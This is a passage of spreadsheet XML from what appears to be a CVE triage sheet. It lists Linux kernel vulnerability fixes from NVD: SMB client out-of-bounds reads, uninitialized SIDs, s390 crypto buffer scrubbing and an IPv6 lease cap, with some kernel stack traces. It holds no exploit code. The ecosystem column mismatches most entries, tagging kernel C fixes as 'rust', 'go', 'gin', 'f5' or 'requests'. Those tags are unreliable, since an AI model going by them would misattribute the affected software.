  xrep_dir_rebuild_tree+0x99/0x100 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xrep_directory+0x83/0x1c0 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xrep_attempt+0x4f/0x1e0 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xfs_scrub_metadata+0x393/0x5b0 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xfs_ioc_scrubv_metadata+0x306/0x570 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xfs_file_ioctl+0xa4f/0x1150 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  __x64_sys_ioctl+0x76/0xc0
  do_syscall_64+0x7a/0x3b0
  entry_SYSCALL_64_after_hwframe+0x4b/0x53
This is a consequence of commit 0fe77e57588b98, which added the
following assertion to xfs_da_grow_inode_int:
 ASSERT(args-&gt;total &gt;= dp-&gt;i_nblocks - nblks);
Tracing this back to xrep_dir_swap_prep, I noticed that the xfs_da_args
object that's passed to xfs_dir2_sf_to_block sets args-&gt;total to 1.
This is incorrect because mkfs set the directory block size to 8k and
the filesystem block size to 4k.  In other words, args-&gt;total should be
2 here, not 1.
Dave Chinner tripped over the same problem with the same branch through
a different channel -- his test setup set the fs block size to 1k, in
which case the directory block size is still set to 4k.  Here,
args-&gt;total should be 4.
Changing the assignment of args-&gt;total to sc-&gt;mp-&gt;m_dir_geo-&gt;fsbcount
makes the assertion go away, but that isn't a complete fix.  In
xrep_tempexch_estimate, we also incorrectly assume that a shortform
conversion requires 1 fsblock when it should be m_dir_geo-&gt;fsbcount.
Without that, we can under-reserve space in the transaction and cause a
filesystem shutdown.
Note that the xfs_dabuf_nfsb helper will compute the correct value for
directories and xattr, so we use that instead of open-coding the logic.
Also fix xrep_xattr_swap_prep to assign args-&gt;total via xfs_dabuf_nfsb
to avoid one logic bomb if we ever support multi-fsblock attrs.
Tripped-by: 0fe77e57588b98 ("xfs: assert the reservation covers each da fork growth")</t>
        </is>
      </c>
      <c r="T273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97549</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97554</t>
        </is>
      </c>
      <c r="D274" s="5" t="inlineStr"/>
      <c r="E274" s="5" t="inlineStr"/>
      <c r="F274" s="5" t="inlineStr"/>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="inlineStr"/>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q274" s="5" t="inlineStr"/>
      <c r="R274" s="5" t="inlineStr"/>
      <c r="S274" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: avoid using uninitialized SIDs in cifs_posix_to_fattr()
cifs_posix_to_fattr() ignores the return value of posix_info_parse().
When a malformed POSIX directory entry is encountered (e.g. invalid
SID lengths from an untrusted server), posix_info_parse() returns -1
without populating the 'parsed' struct.  The uninitialized stack
memory in parsed.owner and parsed.group is then passed to
sid_to_id(), which processes the garbage bytes and passes them to
request_key() to construct a SID string, potentially leaking kernel
stack contents to the userspace idmap daemon.
Fix this by checking the return value and skipping the SID-to-id
mapping when parsing fails.  The remaining fattr fields (timestamps,
mode, etc.) are populated directly from the 'info' pointer so they
are unaffected.</t>
        </is>
      </c>
      <c r="T274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97554</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97559</t>
        </is>
      </c>
      <c r="D275" s="5" t="inlineStr"/>
      <c r="E275" s="5" t="inlineStr"/>
      <c r="F275" s="5" t="inlineStr"/>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="inlineStr"/>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K275" s="5" t="inlineStr"/>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q275" s="5" t="inlineStr"/>
      <c r="R275" s="5" t="inlineStr"/>
      <c r="S275" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fail DACL rewrite when the new DACL exceeds 64K
replace_sids_and_copy_aces() and set_chmod_dacl() accumulate the size of
the DACL they build in a u16. That accumulator can wrap.
validate_dacl() caps num_aces at (dacl_size - sizeof(struct smb_acl)) /
20, i.e. 3276 for a maximally sized DACL, while each rewritten ACE can
grow to sizeof(struct smb_ace) (76 bytes) once its SID is replaced with
one carrying SID_MAX_SUB_AUTHORITIES sub-authorities. The worst case is
therefore sizeof(struct smb_acl) + 3276 * 76 = 248984 bytes, far beyond
what a u16 can hold. A wraparound is reached with 863 ACEs.
After the wraparound, ndacl_ptr-&gt;size becomes meaningless and the offset
will point anywhere in the ACE array. As a result, we will see
corruption of the DACL, which then gets sent to the server. This is not
an out-of-bounds write as the allocation now covers the worst-case
expansion, so writes will always go into the buffer.
Adjust the code to use a u32 internally and return -EOVERFLOW in the
overflow case. The operation must be refused, because a DACL can only
hold 2^16-1 bytes on the wire and larger DACLs cannot be represented.
set_chmod_dacl() carries the same pattern and is fixed the same way. It
only wraps once the source DACL comes within roughly 380 bytes of the
64K ceiling, but the failure mode is identical.</t>
        </is>
      </c>
      <c r="T275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97559</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97560</t>
        </is>
      </c>
      <c r="D276" s="5" t="inlineStr"/>
      <c r="E276" s="5" t="inlineStr"/>
      <c r="F276" s="5" t="inlineStr"/>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="inlineStr"/>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K276" s="5" t="inlineStr"/>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q276" s="5" t="inlineStr"/>
      <c r="R276" s="5" t="inlineStr"/>
      <c r="S276" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix one-byte OOB read in smb2_parse_native_symlink()
When parsing a share-root relative native symlink, memcpy copies
smb_target+1 (skipping the leading separator) but uses
strlen(smb_target)+1 as the length, reading one byte past the
allocated buffer.
This fixes the following KASAN splat when accessing an SMB symlink
with a target of '\a\b':
  BUG: KASAN: slab-out-of-bounds in smb2_parse_native_symlink+0x4f5/0xca0
  Read of size 5 at addr ffff88800878fe21 by task netfsfuzz-execu/1
  CPU: 1 UID: 0 PID: 1 Comm: netfsfuzz-execu Tainted: G N
  7.2.0-11943-g2709dd5ae32f-dirty #1 PREEMPT(lazy)
  Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix,
  1996)
  Call Trace:
   &lt;TASK&gt;
   dump_stack_lvl+0x7b/0xa0
   print_report+0xd0/0x630
   kasan_report+0xe5/0x120
   kasan_check_range+0x105/0x1b0
   __asan_memcpy+0x23/0x60
   smb2_parse_native_symlink+0x4f5/0xca0
   parse_reparse_point+0x68a/0x1530
   reparse_info_to_fattr+0x752/0xa20
   cifs_get_fattr+0x873/0x15b0
   cifs_get_inode_info+0xc0/0x310
   cifs_lookup+0x308/0xa70
   __lookup_slow+0x122/0x2b0
   lookup_slow+0x50/0x70
   path_lookupat+0x525/0xaf0
   filename_lookup+0x1f2/0x550
   vfs_statx+0xd1/0x1a0
   vfs_fstatat+0x65/0xc0
   __do_sys_newfstatat+0x9a/0x120
   do_syscall_64+0xdd/0x4a0
   entry_SYSCALL_64_after_hwframe+0x77/0x7f</t>
        </is>
      </c>
      <c r="T276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97560</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97561</t>
        </is>
      </c>
      <c r="D277" s="5" t="inlineStr"/>
      <c r="E277" s="5" t="inlineStr"/>
      <c r="F277" s="5" t="inlineStr"/>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="inlineStr"/>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K277" s="5" t="inlineStr"/>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q277" s="5" t="inlineStr"/>
      <c r="R277" s="5" t="inlineStr"/>
      <c r="S277" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: honor forceuid/forcegid when mapping SIDs to uid/gid
When the administrator mounts with forceuid or forcegid (uid=/gid=
mount options), they expect all files to appear owned by the specified
user/group.  However, several code paths unconditionally called
sid_to_id() to overwrite cf_uid/cf_gid with server-provided values,
ignoring the administrator's explicit override:
  - smb311_posix_info_to_fattr() (stat via POSIX extensions)
  - cifs_posix_to_fattr() (readdir via POSIX extensions)
  - parse_sec_desc() (CIFS ACL ownership mapping)
This allowed an untrusted server to dictate local file ownership even
when the mount was configured to force specific uid/gid values.
Fix all three call sites to check CIFS_MOUNT_OVERR_UID and
CIFS_MOUNT_OVERR_GID before calling sid_to_id(), following the
same pattern already used by cifs_unix_basic_to_fattr() for unix
extensions.</t>
        </is>
      </c>
      <c r="T277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97561</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97563</t>
        </is>
      </c>
      <c r="D278" s="5" t="inlineStr"/>
      <c r="E278" s="5" t="inlineStr"/>
      <c r="F278" s="5" t="inlineStr"/>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="inlineStr"/>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K278" s="5" t="inlineStr"/>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q278" s="5" t="inlineStr"/>
      <c r="R278" s="5" t="inlineStr"/>
      <c r="S278" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: reject out-of-bounds DataOffset in CIFSSMBRead()
The SMB1 synchronous read helper CIFSSMBRead() validates the server's
DataLength against CIFSMaxBufSize and the caller's count, but never
validates DataOffset. The copy source is formed as
	&amp;pSMBr-&gt;hdr.Protocol + le16_to_cpu(pSMBr-&gt;DataOffset)
and memcpy()'d for DataLength bytes with no check that the
[DataOffset, DataOffset + DataLength) range lies within the response
actually received from the server.
A malicious or compromised SMB1 server can return a response carrying
an in-range DataLength and a large DataOffset, driving the source
pointer past the end of the response buffer. The memcpy() then copies
adjacent kernel heap into the caller's read buffer (information
disclosure), or reads unmapped memory and oopses (denial of service).
SMB1 is not negotiated by default; reaching this code requires an
explicit vers=1.0 mount.
Both DataOffset and the received response length recorded in
rsp_iov.iov_len are relative to the start of the SMB header, so reject
the response unless DataOffset + DataLength fits within that length,
using overflow-safe arithmetic, before forming the source pointer.
The response length has been validated by the previous patch, so the
DataOffset and DataLength fields can be read safely here.
While here, make data_length unsigned. It holds a length derived from
unsigned on-the-wire fields and is only ever compared against unsigned
quantities; print it with %u accordingly, and add __func__ to the
cifs_dbg() calls in this function.</t>
        </is>
      </c>
      <c r="T278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97563</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97564</t>
        </is>
      </c>
      <c r="D279" s="5" t="inlineStr"/>
      <c r="E279" s="5" t="inlineStr"/>
      <c r="F279" s="5" t="inlineStr"/>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="inlineStr"/>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q279" s="5" t="inlineStr"/>
      <c r="R279" s="5" t="inlineStr"/>
      <c r="S279" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: reject userspace cifs.idmap descriptions
cifs.idmap key descriptions carry authority-bearing fields (owner and
group SIDs and uid/gid values in "os:"/"gs:"/"oi:"/"gi:" form) that the
cifs.idmap upcall helper treats as kernel-originating inputs.  Unlike
its sibling cifs.spnego, the cifs.idmap key type has no vet_description
hook, so userspace can create keys of this type through
request_key(2)/add_key(2) and supply those fields without CIFS origin.
A request_key(2) call with a non-NULL callout then drives a root
usermodehelper upcall (/sbin/request-key -&gt; cifs.idmap) that consumes
the unvetted description in root context.
Only accept cifs.idmap descriptions while CIFS is using its private
root_cred to request the key.  id_to_sid()/sid_to_id() already run
under override_creds(root_cred), so the kernel-originated path is
unaffected.
This mirrors commit 3da1fdf4efbc ("smb: client: reject userspace
cifs.spnego descriptions"), which applied the same restriction to
cifs.spnego.</t>
        </is>
      </c>
      <c r="T279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97564</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97565</t>
        </is>
      </c>
      <c r="D280" s="5" t="inlineStr"/>
      <c r="E280" s="5" t="inlineStr"/>
      <c r="F280" s="5" t="inlineStr"/>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="inlineStr"/>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K280" s="5" t="inlineStr"/>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q280" s="5" t="inlineStr"/>
      <c r="R280" s="5" t="inlineStr"/>
      <c r="S280" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: reject short READ responses in CIFSSMBRead()
CIFSSMBRead() reads DataLengthHigh, DataLength and DataOffset out of
the READ_RSP returned by the server without first checking that a
whole READ_RSP was actually received. The length of the response is
recorded in rsp_iov.iov_len, but nothing constrains it to be at least
read_rsp_size before those fields are dereferenced.
A malicious or compromised SMB1 server can return a response shorter
than the READ_RSP header, so that parsing the header itself reads past
the end of the receive buffer. SMB1 is not negotiated by default;
reaching this code requires an explicit vers=1.0 mount.
Reject the response unless it is at least read_rsp_size bytes long.</t>
        </is>
      </c>
      <c r="T280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97565</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97590</t>
        </is>
      </c>
      <c r="D281" s="5" t="inlineStr"/>
      <c r="E281" s="5" t="inlineStr"/>
      <c r="F281" s="5" t="inlineStr"/>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="inlineStr"/>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q281" s="5" t="inlineStr"/>
      <c r="R281" s="5" t="inlineStr"/>
      <c r="S281" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/crypto: Fix missing scrub of temp buffers with PAES algorithm
In function ctr_paes_do_crypt() there is a buffer used to process
remaining bytes &lt; AES_BLOCK_SIZE. This buffer was not scrubbed and
thus could lead to expose of unwanted data. Rework the code to
explicitly scrub the buffer at the end of the function to avoid
exposure of maybe sensitive data.
In function __xts_2keys_prep_param() change the existing scrub to
clean the whole param block instead of just the key field.</t>
        </is>
      </c>
      <c r="T281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97590</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97591</t>
        </is>
      </c>
      <c r="D282" s="5" t="inlineStr"/>
      <c r="E282" s="5" t="inlineStr"/>
      <c r="F282" s="5" t="inlineStr"/>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="inlineStr"/>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K282" s="5" t="inlineStr"/>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q282" s="5" t="inlineStr"/>
      <c r="R282" s="5" t="inlineStr"/>
      <c r="S282" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/crypto: Fix handling of EBUSY in PHMAC when req is pushed to crypto engine
When a request is transferred to the engine via
crypto_transfer_hash_request_to_engine() there are two return codes
signaling a successful transfer: EINPROGRESS and EBUSY. However the
correct handling of EBUSY was missing and has been added as a return
code indicating a successful transfer to the crypto engine.</t>
        </is>
      </c>
      <c r="T282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97591</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97592</t>
        </is>
      </c>
      <c r="D283" s="5" t="inlineStr"/>
      <c r="E283" s="5" t="inlineStr"/>
      <c r="F283" s="5" t="inlineStr"/>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="inlineStr"/>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K283" s="5" t="inlineStr"/>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q283" s="5" t="inlineStr"/>
      <c r="R283" s="5" t="inlineStr"/>
      <c r="S283" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/crypto: Fix missing scrub of temp buffers with AES ctr and gcm algorithm
In function ctr_aes_crypt() there is a buffer used to process
remaining bytes &lt; AES_BLOCK_SIZE. This buffer was not scrubbed and
thus could lead to expose of unwanted data. When the buffer is used
explicitly scrub it at the end of the code block to avoid exposure of
maybe sensitive data.
In a similar way the function gcm_aes_crypt() hat an error path where
the CPACF param block was not scrubbed. Instead of return early now
these error paths go to end of function where explicit scrubbing is
done. Similar with the buffers which are part of the gcm_sg_walk
structs from the variables gw_in and gw_out.</t>
        </is>
      </c>
      <c r="T283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97592</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97593</t>
        </is>
      </c>
      <c r="D284" s="5" t="inlineStr"/>
      <c r="E284" s="5" t="inlineStr"/>
      <c r="F284" s="5" t="inlineStr"/>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="inlineStr"/>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q284" s="5" t="inlineStr"/>
      <c r="R284" s="5" t="inlineStr"/>
      <c r="S284" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/s390: Fix NULL dereference in iova_to_phys() with ZPCI_TABLE_TYPE_RFX
When using a 5-level translation table via ZPCI_TABLE_TYPE_RFX
get_rso_from_iova() returns NULL when the region-first entry is invalid.
Yet in get_rto_from_iova() the region-second origin rso is not checked
to be non-NULL before accessing rso[rsx] leading to a NULL pointer
dereference instead of a NULL return when iova_to_phys() is called on
a unmapped IOVA. Fix this by adding the missing NULL check.</t>
        </is>
      </c>
      <c r="T284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97593</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97597</t>
        </is>
      </c>
      <c r="D285" s="5" t="inlineStr"/>
      <c r="E285" s="5" t="inlineStr"/>
      <c r="F285" s="5" t="inlineStr"/>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="inlineStr"/>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q285" s="5" t="inlineStr"/>
      <c r="R285" s="5" t="inlineStr"/>
      <c r="S285" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: flowlabel: cap duplicate leases per socket
ipv6_flowlabel_get() allocates an ipv6_fl_socklist entry for every
successful GET. The recheck path for a compatible existing flowlabel
links another lease without applying any lease admission check. Repeated
GET requests for one shareable label can therefore grow a socket's lease
list without bound.
Reject a new unprivileged lease once the socket already holds
FL_MAX_PER_SOCK leases. Check this on the shared recheck path so reuse
of a globally interned label, including the fl_intern() collision path,
is covered as well. New-label admission remains under the existing
mem_check() policy.
Use capable(CAP_NET_ADMIN) rather than ns_capable(), matching
mem_check(). An unprivileged user must not bypass the cap by creating a
user namespace and a netns where they have CAP_NET_ADMIN, which would
still consume host memory.
Check the capability only when the socket reaches the limit, so
successful unprivileged GET requests below the cap do not generate a
capability audit. Do the admission check before updating linger and
expires so a rejected GET does not refresh the shared label, matching
the existing socket-list allocation failure path.</t>
        </is>
      </c>
      <c r="T285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97597</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97598</t>
        </is>
      </c>
      <c r="D286" s="5" t="inlineStr"/>
      <c r="E286" s="5" t="inlineStr"/>
      <c r="F286" s="5" t="inlineStr"/>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="inlineStr"/>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
